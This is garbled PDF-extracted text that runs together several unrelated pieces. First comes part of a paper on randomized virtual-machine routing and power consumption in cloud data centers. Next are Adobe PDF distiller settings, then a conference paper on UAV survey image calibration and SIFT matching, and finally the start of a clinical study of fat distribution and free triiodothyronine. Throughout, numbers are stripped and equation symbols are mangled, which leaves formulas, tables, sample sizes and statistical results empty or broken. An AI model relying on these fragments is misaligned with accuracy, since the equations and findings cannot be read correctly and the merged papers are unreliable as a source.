power consumption of the data center. according to the results of the standard experiments stated in (spec.org, ) (fig. ), the instantaneous power consumption of pm i is a function of utilization level of that pm (k) as below wi ¼ a þ bk; for k . ð Þ ; for k ¼ ð Þ � . . . . utilization (load) p o w e r (w a tt ) active idle full load figure linear power consumption. full-size doi: . /peerj-cs. /fig- khani and khanmirza ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ where � k � is integer variable and both a and b are fixed values. in our model, k can be seen as the number of vms in pm i. then the expected steady state of power consumption will be exp½wi� ¼ x k¼ wi;kpi;k ( ) ¼ að � pi; Þ þ b x k¼ kpi;k ( ) where pi,k denotes the steady-state probability that the utilization of pm i is k and can be calculated by eq. ( ) for n = . note that exp[wi] = if and only if li = (pi, = ). our objective is to determine the vector r! that minimizes the total expected steady-state power consumption of the data center, that is, min ~r x i p exp½wi� ( ) sla constraint we are interested in keeping the probability of slav below a given value ε. slav happens when a pm i does not have sufficient capacity for a new arriving vm (when m/g/ / is in state ). the slav constraint is prðslavÞ ¼ pi; � e i p ( ) where pi, denotes the steady-state blocking probability for pm i. optimization problem in this section, we consider the optimization problem, in which the router decides where each incoming vm will be sent, so as to minimize the total expected power consumption subject to the sla constraints. the optimization problem can be formulated as follows: min ~r x i p exp½wi� ( ) s:t: x i p ri ¼ ( ) pi; � e i p ( ) �i ¼ �ri i p ( ) let us rewrite the optimization problem by changing our optimization variable from ~r ¼ r ; r ; :::; rjpj � � to ~x ¼ x ; x ; :::; xjpj � � which is defined below xi ¼ �i m ¼ �ri m ( ) using eq. ( ) and putting eq. ( ) for k = in eq. ( ) we get x i ! p k¼ xki k! � e ( ) khani and khanmirza ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ if we can solve this inequality constraint for xi then we have a simple inequality constraint in the form of xi < f(ε). fortunately, numerical methods can be used to solve it. we show numerical results β for some practical values of ε in table . for example, in the first row, we have β = for ε = . . it means that if we send vms with a rate below (xi < β = ) to pm i then we will guarantee that the probability of slav is below . (pr(slav) < ε = . ) for that pm. the equivalent optimization problem will be min ~r foð~xÞ ¼ x i p gðxiÞ ( ) s:t: x i p xi ¼ � m ( ) xi � b i p ( ) in which gðxÞ ¼ a þ x k¼ xk k! �a þ b x k¼ k xk k! ! ( ) the c(x) can be obtained using eqs. ( ), ( ) and ( ) with ease. we set a = and b = . for a pm equipped with intel xeon e processor (spec.org, ). then, we can show that the first order derivative of c(x) is positive (c′(x) > ) and the second order derivative of c(x) is negative (c″(x) < ) for ( � x � ) with numerical methods. theorem . for any x and y ( < y � x � β), there exists d ( < d � y and < d � β - x), so that gðx þ dÞ þ gðy � dÞ � gðxÞ þ gðyÞ ( ) proof: c″(x) < means that the derivative (c′(x)) is nonincreasing. the condition y � x implies that the c′(x) � c′(y). using definition of derivative and < c′(x), we obtain < gðx þ dÞ � gðxÞ d � gðyÞ � gðy � dÞ d ( ) multiplying the above inequality by d and adding c(y - d) + c(x) yields eq. ( ). let x denotes the set of elements of ~x. we define �ð~xÞ ¼ fx xj < x < bg. table numerical results for maximum incoming rate (xi < β) based on acceptable slav probability (ε). slav probability (ε) maximum rate (β) . . - - - khani and khanmirza ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ theorem . the size of the subset � for minimal vector is at most one. proof: consider ~x which satisfies eqs. ( )–( ) and �ð~xÞj >j . in our proof, we define a method to transform ~x to x ! . then we show the following properties for the transformation. . the value of fo for the transformed ~x is not greater than the original ~x foðx ! Þ � foðx !Þ ( ) . the transformation has convergence property. if we repeat the transformation we reach x� ! where �ðx�!Þ � and we could not apply transformation anymore. first the definition of transformation, because �ð~xÞj j > , we can find xi and xj from �ð~xÞ where < xi < β and < xj < β. without loss of generality, assume < xi � xj < β. we have two cases for xi + xj: ( ) xi + xj � β, ( ) xi + xj < β. in the first case, we define d = β - yi and then change only the value xi and xj in ~x to get x ! as follows: x i ¼ xi þ d ¼ b ( ) x j ¼ xj � d ( ) in the second case, we define d = yj and then change only the value xi and xj in x ! as follows x i ¼ xi þ xj ( ) x j ¼ ( ) note that x i þ x j ¼ xi þ xj and the constraint eq. ( ) is still satisfied by x ! . after defining transformation, we prove the first property. using theorem with defined d, we can conclude gðxi þ dÞ þ gðxj þ dÞ ¼ gðx iÞ þ gðx jÞ � gðxiÞ þ gðxjÞ ( ) adding unchanged elements of x! to both sides of above inequality, yields eq. ( ). for the proof of the second property, consider eqs. ( ) and ( ). these imply that at least one of xi or xj will not be in the subset �ðx !Þ. then the size of subset f is decreased by the transformation as follows j�ð~xÞj � j�ðx !Þj ¼ for xi ¼ xj for xi ¼ xj ¼ b ( ( ) because �ð~xÞj j > it will reach or eventually and more transformation is not possible. at this point, due to the first property eq. ( ) we reach a minimal vector. without loss of generality we assume that the elements of the minimal vector are ordered x� � x� � ::: � x�jpj. the minimal (solution) of eqs. ( ) and ( ) will be khani and khanmirza ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ x�i ¼ b for � i � n� � m � bn� for i ¼ n� þ for others >< >: ( ) where n� ¼ bm j k is the number of pms which must be filled completely (up to β). the remaining load (if exists) must be dispatched to the next pm. for large scale data centers, we can neglect this pm and show the solution of eqs. ( )–( ) as follows. r�i ¼ n� for � i � n� for others ( ( ) for implementation, we only need a random generator. when a new vm arrives, we draw i form [ , n�] and sends this vm to pm i. we do not require any polling, therefore our implementation is simple and agile as we need it in a cloud data center. simulation results to validate the analytical solution, we have built a discrete event simulator of a cp data center using matlab ( ). we have considered the system with two different sojourn time distribution: exponential and uniform. in both cases the mean sojourn time is fixed at m = . the mean inter arrival time of vms was made variable from (l = to ) to give reasonable insight into the behavior and dimensioning of cp data centers. regarding l and m, traffic intensity varies from to which represents the mean number of vms in data center at steady state according to the little formula. the number of active pms according to � n� ¼ � bm � depends indirectly on ε, e.g., for ε = - (β = ) it varies from to , servers. the values chosen may be quite applicable to small- to large-sized cps data centers that try to keep the utilization of their servers as high as possible while guarantee a minimum qos for the users. it is noteworthy that no cp published information regarding average traffic intensity, number of servers or the percentage of reserved. we generate confidence intervals ( %) for steady state measurement using independent replications with deletions method. first, we run independent replications of each simulation, then we remove samples of transient phase and finally we calculate the sample mean. figure depicts the slav probability in data center at steady state. simulation results follows analytical model perfectly for all � m and β, values. this observation supports the validity of the analytical model findings. as can be seen, probability for exponential sojourn time is generally less than probability for uniform one. note that the mean time is the same for both distribution, and this may relates to the variance. the variance of exponential is about , but the variance of uniform is about . as the number of active servers increases, the slav probability decreased steadily. this trend is due to the fact that with more active servers, an arriving vm has more places to be hosted and the chance of blocking and slav is lower. figure shows the effect of sojourn time distribution on the convergence time. the data center with exponential sojourn time reaches to steady state sooner than a data center with uniform sojourn time. we only show the results for β = , l = , m = because the khani and khanmirza ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ optimal active pms (n*) . . . s la v p ro b. - (a) = sim exp sim uni analytical model optimal active pms (n*) . . . s la v p ro b. - (b) = sim exp sim uni analytical model optimal active pms (n*) . . . s la v p ro b. - (c) = sim exp sim uni analytical model optimal active pms (n*) . . . s la v p ro b. (d) slav = sim exp sim uni analytical model optimal active pms (n*) . . . . . s la v p ro b. (e) = sim exp sim uni analytical model figure slav probability in data center at steady state for various β (a) β = (b) β = (c) β = (d) β = , (e) β = . full-size doi: . /peerj-cs. /fig- . . . time (min) n um be r of s la v = = = exp uni figure effect of sojourn time distribution on the convergence time. full-size doi: . /peerj-cs. /fig- khani and khanmirza ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ discussion aims to highlight the influences of distribution on convergence time; for larger systems and lower probability, the discussion is the same. in order to study the power consumption of our method in practice, we use google trace (reiss, wilkes & hellerstein, ) which consists of several concurrent vms in a single ∼ k server farm where the resource demand of vms is highly dynamic and needs quick decisions. figure compares the power consumption for our method with two benchmark algorithms in the literature: pabfd (beloglazov & buyya, ) and mt (domanal & reddy, ). the power consumption in our method is just about % more than pabfd and mt. this higher power consumption is acceptable, because the workload is highly dynamic, varying over time, and is driven by many short jobs that demand quick scheduling decisions and updates. pabfd and mt suffers from long decision process and overwhelming migrations. these shortcomings make both of them fruitless in real world cloud computing scenarios. the comparison gives us an idea about how far we are from idealistic benchmark algorithms in the literature. conclusion effective resource management is a major challenge for the leading cps (e.g., google, microsoft, amazon). performance evaluation of data centers is an important aspect of resource management which is of crucial interest for both cps and cloud users. in this paper, we proposed an analytical model based on the m/g/n/n system for performance evaluation of a cloud computing data center. due to the nature of the cloud computing, we assumed general sojourn time for vms as well as large number of pms. these assumptions make our model acceptable in terms of scale and diversity. through extensive numerical simulations, we showed that our analytical model closely alignes with simulation results. our results also indicate that our method consumes a bit more power than idealistic benchmark in the literature. in the future, we plan to extend our model for variable size vms. studying how “power of two choice” can improve the result of randomized dispatcher will be another dimension of extension. time (min) p ow er ( w at t) rd mt pabfd figure power consumption by a data center managed by random dispatcher and benchmark algorithms. full-size doi: . /peerj-cs. /fig- khani and khanmirza ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ additional information and declarations funding the authors received no funding for this work. competing interests the authors declare that they have no competing interests. author contributions � hadi khani conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work. � hamed khanmirza analyzed the data, contributed reagents/materials/analysis tools, authored or reviewed drafts of the paper, approved the final draft, writing, latex. data availability the following information was supplied regarding data availability: the source code is available in the supplemental file. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references beloglazov a, buyya r. . optimal online deterministic algorithms and adaptive heuristics for energy and performance efficient dynamic consolidation of virtual machines in cloud data centers. concurrency and computation: practice and experience ( ): – doi . /cpe. . boxma oj, cohen j, huffels n. . approximations of the mean waiting time in an m/g/s queueing system. operations research ( ): – . carvalho m, menasce d, brasileiro f. . prediction-based admission control for iaas clouds with multiple service classes. in: ieee th international conference on cloud computing technology and science (cloudcom). piscataway: ieee, – . domanal sg, reddy grm. . load balancing in cloud computing using modified throttled algorithm. in: ieee international conference on cloud computing in emerging markets (ccem), piscataway: ieee, – . kelly fp. . loss networks. annals of applied probability ( ): – . kimura t. . diffusion approximation for an m/g/m queue. operations research ( ): – . kimura t. . a transform-free approximation for the finite capacity m/g/s queue. operations research ( ): – doi . /opre. . . . ma bn, mark jw. . approximation of the mean queue length of an m/g/c queueing system. operations research ( ): – doi . /opre. . . . matlab. . version . . (r a). natick: the mathworks inc. khani and khanmirza ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /cpe. http://dx.doi.org/ . /opre. . . http://dx.doi.org/ . /opre. . . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ miyazawa m. . approximation of the queue-length distribution of an m/gi/s queue by the basic equations. journal of applied probability ( ): – doi . / . nozaki sa, ross sm. . approximations in finite-capacity multi-server queues by poisson arrivals. journal of applied probability ( ): – doi . / . reiss c, wilkes j, hellerstein jl. . google cluster-usage traces: format + schema. technical report. mountain view: google inc. shojafar m, cordeschi n, baccarelli e. . energy-efficient adaptive resource management for real-time vehicular cloud services. ieee transactions on cloud computing ( ): – doi . /tcc. . . smith jm. . m/g/c/k blocking probability models and system performance. performance evaluation ( ): – doi . /s - ( ) - . spec.org. . all specpower_ssj benchmark results. available at http://www.spec.org/ (accessed november ). tijms hc, van hoorn mh, federgruen a. . approximations for the steady-state probabilities in the m/g/c queue. advances in applied probability ( ): – doi . / . trivedi ks. . probability and statistics with reliability, queueing, and computer science applications. second edition. new york: john wiley & sons, inc. wang b, chang x, liu j. . modeling heterogeneous virtual machines on iaas data centers. ieee communications letters ( ): – doi . /lcomm. . . wang l, gelenbe e. . adaptive dispatching of tasks in the cloud. ieee transactions on cloud computing ( ): – doi . /tcc. . . wang w, jiang y, wu w. . multiagent-based resource allocation for energy minimization in cloud computing systems. ieee transactions on systems, man, and cybernetics: systems ( ): – doi . /tsmc. . . yang b, tan f, dai ys, guo s. . performance evaluation of cloud service considering fault recovery. in: jaatun mg, zhao g, rong c, eds. cloud computing. cloudcom . lecture notes in computer science. vol. . berlin, heidelberg: springer, – . yao dd. . refining the diffusion approximation for the m/g/m queue. operations research ( ): – . yue m. . a simple proof of the inequality ffd (l) � / opt (l) + , ∀l for the ffd bin-packing algorithm. acta mathematicae applicatae sinica ( ): – . khani and khanmirza ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . / http://dx.doi.org/ . / http://dx.doi.org/ . /tcc. . http://dx.doi.org/ . /s - ( ) - http://www.spec.org/ http://dx.doi.org/ . / http://dx.doi.org/ . /lcomm. . http://dx.doi.org/ . /tcc. . http://dx.doi.org/ . /tsmc. . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ randomized routing of virtual machines in iaas data centers introduction related work system model optimization problem simulation results conclusion references << /ascii encodepages false /allowtransparency false /autopositionepsfiles true /autorotatepages /none /binding /left /calgrayprofile (dot gain %) /calrgbprofile (srgb iec - . ) /calcmykprofile (u.s. web coated \ swop\ v ) /srgbprofile (srgb iec - . ) /cannotembedfontpolicy /warning /compatibilitylevel . /compressobjects /off /compresspages true /convertimagestoindexed true /passthroughjpegimages true /createjobticket false /defaultrenderingintent /default /detectblends true /detectcurves . /colorconversionstrategy /leavecolorunchanged /dothumbnails false /embedallfonts true /embedopentype false /parseiccprofilesincomments true /embedjoboptions true /dscreportinglevel /emitdscwarnings false /endpage - /imagememory /lockdistillerparams false /maxsubsetpct /optimize true /opm /parsedsccomments true /parsedsccommentsfordocinfo true /preservecopypage true /preservedicmykvalues true /preserveepsinfo true /preserveflatness true /preservehalftoneinfo false /preserveopicomments false /preserveoverprintsettings true /startpage /subsetfonts true /transferfunctioninfo /apply /ucrandbginfo /preserve /useprologue false /colorsettingsfile (none) /alwaysembed [ true ] /neverembed [ true ] /antialiascolorimages false /cropcolorimages true /colorimageminresolution /colorimageminresolutionpolicy /ok /downsamplecolorimages false /colorimagedownsampletype /average /colorimageresolution /colorimagedepth /colorimagemindownsampledepth /colorimagedownsamplethreshold . /encodecolorimages true /colorimagefilter /flateencode /autofiltercolorimages false /colorimageautofilterstrategy /jpeg /coloracsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /colorimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg coloracsimagedict << /tilewidth /tileheight /quality >> /jpeg colorimagedict << /tilewidth /tileheight /quality >> /antialiasgrayimages false /cropgrayimages true /grayimageminresolution /grayimageminresolutionpolicy /ok /downsamplegrayimages false /grayimagedownsampletype /average /grayimageresolution /grayimagedepth /grayimagemindownsampledepth /grayimagedownsamplethreshold . /encodegrayimages true /grayimagefilter /flateencode /autofiltergrayimages false /grayimageautofilterstrategy /jpeg /grayacsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /grayimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg grayacsimagedict << /tilewidth /tileheight /quality >> /jpeg grayimagedict << /tilewidth /tileheight /quality >> /antialiasmonoimages false /cropmonoimages true /monoimageminresolution /monoimageminresolutionpolicy /ok /downsamplemonoimages false /monoimagedownsampletype /average /monoimageresolution /monoimagedepth - /monoimagedownsamplethreshold . /encodemonoimages true /monoimagefilter /ccittfaxencode /monoimagedict << /k - >> /allowpsxobjects false /checkcompliance [ /none ] /pdfx acheck false /pdfx check false /pdfxcompliantpdfonly false /pdfxnotrimboxerror true /pdfxtrimboxtomediaboxoffset [ . . . . ] /pdfxsetbleedboxtomediabox true /pdfxbleedboxtotrimboxoffset [ . . . . ] /pdfxoutputintentprofile (none) /pdfxoutputconditionidentifier () /pdfxoutputcondition () /pdfxregistryname () /pdfxtrapped /false /createjdffile false /description << /chs <feff f f fd e b bbe b a b efa ef a fc c a c f f fdb c ad d cf a ef ee f f f c f e ee ca f ad c f b efa > /cht <feff f f e b a d f e efa acb f ef ef c a f c f f e a f ad c cea c a ef ee f f f c f e ee ca f ad c f b f df efa acb ef > /dan <feff e c c e e c f f d f b d e c b c b e e c c b f b c e e e e f d f b d e b e e e f c c f e f e e> /deu <feff e e e c c e e a d c c e f e f d f b d e e c f e e e f b b f d b e e f f d e e a e d f e e c c d f b d e b f e e e d f e f e f f f e e e> /esp <feff c f e f e f d e f f f e d f e c e d f f f d e f f e e e f d e f f f e f c f e f e f f e> /fra <feff c a f f e e e f d e f f e d f e c e d d e e c f d e e e e ea f e f c e f e f e c e e> /ita <feff c a a d f a f e f d e f e d c e d e f f b f e f d e f f e f f e f f e f e e> /jpn <feff ad c cea fa b f f e f c b f f e e b cea b fdd c d e c b af c c d d ea f bf e e f f d eb fc d b e e a d b a f c c f d a a eb f f a f e ee d b f c d e > /kor <feffc c c c c acc a d c ec b c a d cd d d b b d bc f ad c ae c d c c ace d c c b c c c c d f bb c cb c c c d b c b e e c b ac c c c b c bb c cb f bc f f e c c c c d c c c f c c c b b c b e e> /nld (gebruik deze instellingen om adobe pdf-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. de gemaakte pdf-documenten kunnen worden geopend met acrobat en adobe reader . en hoger.) /nor <feff b e e c c e e c e f f d f b d e f b f b c e f b c c f f e d f b d e e b e e e f c c f e c c e e> /ptb <feff c a f e e f f d f d e f f d f c d d f b f f f f e f f d e f f f d f f d f f f f e f f f e> /suo <feff b e e e e e b c b e c f f d f b d e a c b f f e c f a f e e c f d f b d e f e f c c a f e a c c a d d c c e> /sve <feff e e e e e e c c e e e f d c c b f d f b d e f b c b e e c b f f b f b e b d f b d e b e f e f f f e f e e> /enu (use these settings to create adobe pdf documents for quality printing on desktop printers and proofers. created pdf documents can be opened with acrobat and adobe reader . and later.) >> /namespace [ (adobe) (common) ( . ) ] /othernamespaces [ << /asreaderspreads false /cropimagestoframes true /errorcontrol /warnandcontinue /flattenerignorespreadoverrides false /includeguidesgrids false /includenonprinting false /includeslug false /namespace [ (adobe) (indesign) ( . ) ] /omitplacedbitmaps false /omitplacedeps false /omitplacedpdf false /simulateoverprint /legacy >> << /addbleedmarks false /addcolorbars false /addcropmarks false /addpageinfo false /addregmarks false /convertcolors /noconversion /destinationprofilename () /destinationprofileselector /na /downsample bitimages true /flattenerpreset << /presetselector /mediumresolution >> /formelements false /generatestructure true /includebookmarks false /includehyperlinks false /includeinteractive false /includelayers false /includeprofiles true /multimediahandling /useobjectsettings /namespace [ (adobe) (creativesuite) ( . ) ] /pdfxoutputintentprofileselector /na /preserveediting true /untaggedcmykhandling /leaveuntagged /untaggedrgbhandling /leaveuntagged /usedocumentbleed false >> ] >> setdistillerparams << /hwresolution [ ] /pagesize [ . . ] >> setpagedevice international conference on sensor network and computer engineering (icsnce ) research on the key technology of survey measurement image based on uav ding li health services administration xi`an medical university xi’an, , shaanxi, china e-mail: @qq.com chong jiao school of computer science and engineering xi’an technological university xi’an, , shaanxi, china e-mail: @qq.com abstract—with the development of computer technology, especially the emergence of high resolution image sensor, aerial photogrammetry has played an important role in geological survey. traditional aerial measurements are carried out by manned large aircraft, with a large volume of measured information and a wide range of shots. this method is suitable for large area operation, which is high and expensive for hardware site. uav air measurement systems are usually used for small area measurements. the uav is small and fluctuates greatly during flight, the collection of the data and images are not accurate enough. this paper has obtained the accurate measurement of image by studying the image fast matching theory, which has practical significance in the actual mapping and has higher research value. keywords-uav; measurement image; image validation; image preprocessing; image matching; feature extraction i. introduction quadrotor or quadrotor uav, simply called uav, is a type of uav that has four propellers and crosses the propeller. it can record aerial video with a miniature camera. at present, uav surveying mainly relies on image aerial camera to capture images. traditional measuring cameras are not only expensive, but also require film image scanning to acquire digital images with low shooting quality and long measuring time. in this paper, a non-metric camera ccd is used for image acquisition, the advantages of ccd camera are low prices, sensor stability, and high sensitivity. non-metric cameras cannot directly measure because of the large distortion correction error, so it must be calibrated before carrying out aerial photography. ii. uav image preprocessing the uav photography system is equipped with a non-metric digital camera, which has unstable performance, uncertain orientation elements and results in optical distortion error in aerial photography. optical distortion errors include radial distortion and decentering distortion. the focal length of the camera is fixed in this system, so the difference in distortion is the systematic error, which produces the same image for all images collected. the methods of camera calibration include optical laboratory calibration, laboratory calibration and office calibration. the experimental field is consisted of mark points in some known space coordinates. during the calibration process, the experimental field is photographed with the calibrated camera, and inner element and other elements that affect the shape of the beam are solved according to the intersection of the single-chip space or the multiple-chip space [ ]. this system used uav digital camera calibration software easy calibrate to calibrate digital camera sonyrx in the d experimental calibration field. the test results and contents are showed in table ., and origin of coordinate is in the lower left corner of the image. international conference on sensor network and computer engineering (icsnce ) table i. the calibration results of sony rx camera contents of calibration value of calibration comment x - . mm camera interior azimuth element y - . mm focus f . coefficient of radial distortion k . e- radial distortion error coefficient coefficient of radial distortion k - . e- coefficient of eccentric aberration p . e- tangential distortion error coefficient coefficient of eccentric aberration p - . e- correction of image distortion -- indirect method, the coordinates of the corresponding point on the original image is calculated from the coordinates on the corrected image, and the image correction is implemented with the grayscale interpolation method [ ]. as shown in figure . p’y’ x’ p x y p gray value assignment grayscale resampling calculate the image point coordinates postcorrected image distortion image figure . image distortion correction schematic diagram after years of research, the corrected value of the corrected image can be calculated by the deformation error correction model, and the deformation error correction model: ( ) ( ) x, y: coordinate of the image point which origin is the center of the image, x , y : coordinates of the main point of the image ( ) international conference on sensor network and computer engineering (icsnce ) : the error coefficient of radial distortion the error coefficient of eccentric aberration : the non-square scaling factor of pixels the arranged non-orthogonal error coefficients in the ccd array the coordinate of the camera in the camera is calculated with space resection method, and the accuracy of the high-outer azimuth elements is improved, and the precision of geometric calibration is improved. the attitude control of uav is mainly through the signal of the attitude sensor. the attitude sensor includes the tilt sensor and the angular velocity sensor. the titlt sensor is implemented indirectly through the triaxial acceleration sensor [ ]. the output signals represent the current three axial acceleration values. if the uav remain static in space, then the acceleration values are simply converted to get the real dip parameters. however, it is impossible for an uav to keep stationary in the air. under the influence of the wind, the uav may deviate in one direction. at this point, even if the uav does maintain its level, the output of the acceleration sensor still deviate from the center value, resulting in misjudgment of the control core. in order to avoid this situation, it is necessary to introduce triaxial angular velocity sensors and ultrasonic range finder, the acceleration in the x and y direction is corrected to obtain true tilt information with the three axial angular velocities and the acceleration in the z-axis direction and the rate of change of the real-time height [ ]. iii. unmanned aerial vehicle image matching the image matching technique generally adopts image matching technology. the corresponding matching algorithm is used to identify the same name point between two images or multiple images. commonly used matching methods can be divided into two major categories, one is based on the matching of grayscale and the other is based on feature matching [ ]. in this paper, the sift feature matching algorithm is used for high-precision matching of massive data. the sift matching algorithm is based on the matching of local features of the image. the algorithm holds invariance to translation, rotation occlusion, and so on, so it has strong stability in practice. the feature matching process is shown in figure . scale space extreme value detection precise positioning determine the main direction of the key points key point descriptor match feature point sift features vector matching figure . feature matching flow chart a. pyramid image pyramid image refers to the original image are decomposed to obtain a series of sub-images of different resolutions. the images are sorted by resolution from small to large, and then forming a set of pyramidal overlapping images. find the matching point in the top level image, the matching position is used as the prediction position of the next layer, and the matching result of this layer is used as the initial matching position of the next layer to perform matching in order, and the matching result is used as control to match other feature points [ ]. this top-down and coarse-to-fine process ensures the reliability of the image search process. in the pyramid structure, images are represented in a hierarchical structure. at the top of the pyramid structure, the lowest resolution of data is stored. with the increase of the layers of the pyramid, the resolution of the data is sequentially reduced. at the bottom of the pyramid, the highest resolution data that can meet the need of users is stored. under the spatial reference, information is stored and displayed at different resolutions according to user needs, forming a pyramid structure with low-to-high resolution and small to large amount of data. the image pyramid structure is used for image coding and progressive image transmission. it is a typical hierarchical data structure form, suitable for multi-resolution organization of raster data and image data, international conference on sensor network and computer engineering (icsnce ) and also a kind of lossy compression of raster data or image data. b. image feature extraction feature extraction refers to using a computer to propose image information of the same name point in the image, which determines the common features in the image. the image feature extraction generally relies on the distribution of grayscale in the image, and the position, shape and size of the features are determined by this information. the sift feature matching algorithm mainly consists of two parts, extracting unrelated vector features from multiple images and matching sift feature vectors. the scale space representation is an area-based expression. as an important concept in the scale space theory, the scale space is defined as the product of a gaussian convolution kernel and a remote sensing image. after derivation by koendetink and babaud et al., it is proved that the gaussian kernel is the only linear kernel that realizes scale transformation. ( ) l(x, y, σ) is a scale space, g(x, y, σ) is a gaussian convolution kernel, and i(x, y) is a remote sensing image. x, y, and σ represent location parameters and scale parameters. ( ) using the scale space function to establish the gaussian pyramid, the scale space function between two adjacent layers is influenced by the scale ratio between adjacent layers and the same order pyramid, and a differential gaussian pyramid is established. the scale ratio between adjacent layers is defined as k, and the scale factor is defined as σ, and d(x, y, σ) is a differential gaussian pyramid. finally, each sample point is compared with the adjacent point in the space of the adjacent vertical and horizontal scales around the scale space of the same level. if the detection point is the local maximum or minimum value, the point will be a candidate for image at this scale. iv. experimental test installed visual studio on the computer and configured opencv for experimental testing. the experimental image is shown in figure . sift uses c++ to extract image feature points, uses the two-dimensional feature point matching method brute force matcher to match, sets a certain threshold to filter the matching results, uses the findhomography function to set the ransac method to eliminate false matching, and tests the sift to understand its performance according to the above steps. after the threshold value and the basic matrix filter, the points are basically covered in the key area of the image, the distribution of pixel points is relatively uniform, and the error is low, which can meet the matching requirements of the system. the matching test image is shown in figure . international conference on sensor network and computer engineering (icsnce ) figure . feature matching experiments v. conclusion at present, all countries in the world are stepping up the development of uav. compared to manned aircraft, uav has the advantages of small size, low cost, ease of use, low environmental requirements, and strong survivability. western countries have applied new and high technologies to the development of uav, and advanced signal processing and communication technologies have been used to improve the image transmission speed and digital transmission speed of uav. in this paper, based on the theory of air measurement image preprocessing, the image feature extraction method is studied. visual c + + is used to implement sift to extract the image feature points. the two-dimension feature point matching method bruteforce matcher is used to perform image region matching, and ransac is set by findhomography function to eliminate false matches. we obtain the more satisfactory result of match after experiments. however, due to the deficiencies of uav, it is difficult to compare with the professional image processing system. with the development of communication technology and control technology, uav will surely have breakthrough application and development in the field of low-level measurement in the further. reference [ ] yu sheng, wen caiqiang, liu shangguo. the precision measurement technology of digital camera indoor three-dimensional field [j]. . . [ ] tian lei, ma ran. research on the calibration method of unmanned aerial vehicle (uav) [j]. . . [ ] li xiang, wang yongjun, li zhi. misalignment error and correction of the vector sensor of air position system [j]. journal of sensor technology, . . [ ] c. harris, m. j. stephens. a combined corner and edge detector[c]. prco of the th alvey vision conf, : - . [ ] d. g. lowe. distinctive image features from scale-invariant keypoints[j]. international journal of computer vision. , ( ): - . [ ] d. g. lowe. distinctive image features from scale-invariant keypoints[j]. international journal of computer vision. , ( ): - . : – x nie, y xu and et al. fat distribution and thyroid hormones research trunk fat and leg fat in relation to free triiodothyronine in euthyroid postmenopausal women xiaomin nie*, yiting xu*, xiaojing ma, yun shen, yufei wang and yuqian bao department of endocrinology and metabolism, shanghai jiao tong university affiliated sixth people’s hospital; shanghai clinical center for diabetes; shanghai key clinical center for metabolic disease; shanghai diabetes institute; shanghai key laboratory of diabetes mellitus, shanghai, china correspondence should be addressed to x ma or y bao: maxiaojing@sjtu.edu.cn or yqbao@sjtu.edu.cn *(x nie and y xu contributed equally to this work) abstract background: a high level of free triiodothyronine (ft ) within the reference range may be a potential metabolic risk marker. however, the relationship between different fat depots and ft has remained unclear. objective: we aimed to explore the relationships between segmental fat distribution and ft in euthyroid middle-aged and elderly men and postmenopausal women. methods: a total of subjects ( men and women) were enrolled. a bioelectrical impedance analyzer was used to measure total, trunk, arm and leg fat mass (fm) and fat percentage (fat%). the leg fat mass to trunk fat mass ratio (ltr) was calculated to evaluate the relative distribution of leg fat compared with that of trunk fat. thyroid hormones were measured by electrochemical luminescence immunoassay. results: ft in men did not change significantly with increases in ltr quartiles, while ft in women decreased significantly (p for trend =  . ). in multivariate linear regression analysis, multiple metabolic and cardiovascular risk factors were adjusted. the ltr was negatively related to ft in women (p <  . ). after further mutual adjustment for trunk fat and leg fat parameters, trunk fm and fat% were positively related to ft , while leg fm and fat% were negatively related to ft in women (all p <  . ). conclusions: in euthyroid postmenopausal women, trunk fat was positively correlated with ft , whereas leg fat was negatively correlated with ft . our findings supported that a high level of ft within the reference range was related to adverse fat distribution. introduction obesity is the key pathogenic factor of type diabetes and cardiovascular disease ( ). the disease risk associated with obesity is related not only to fat content but also to fat distribution. abdominal obesity characterized by an ‘apple-shape’ significantly increases the risk of type diabetes and cardiovascular disease ( ). in contrast to that, a ‘pear-shape’ with most fat accumulating in the lower body is found to have metabolic and cardiovascular protective effects ( ). free triiodothyronine (ft ) is the bioactive form of thyroxines. ft regulates basal metabolic rate, promotes fat decomposition and acts on the cardiovascular system through adrenergic signaling ( ). previous studies have found that a high level of ft within the reference range was positively related to bmi and waist circumference ( , ). non-alcoholic fatty liver disease (nafld) is one of the most common complications of obesity. in recent years, some studies found that a high level of ft within - - key words f trunk fat f leg fat f trunk fat mass to leg fat mass ratio f free triiodothyronine endocrine connections ( ) , – id: - this work is licensed under a creative commons attribution-noncommercial-noderivatives . international license. https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access mailto:maxiaojing@sjtu.edu.cn mailto:yqbao@sjtu.edu.cn https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://doi.org/ . /ec- - 